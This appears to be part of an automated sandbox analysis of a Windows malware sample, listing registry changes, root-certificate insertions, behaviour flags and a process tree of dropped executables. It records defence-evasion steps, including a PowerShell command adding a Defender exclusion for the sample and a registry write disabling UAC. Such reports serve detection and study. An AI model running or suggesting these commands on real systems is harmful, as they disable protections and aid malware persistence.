| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe
"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2604 -s 836
C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
"C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe"
C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"
C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"
C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"
C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"
C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240508235243.log C:\Windows\Logs\CBS\CbsPersist_20240508235243.cab
C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe"
C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"
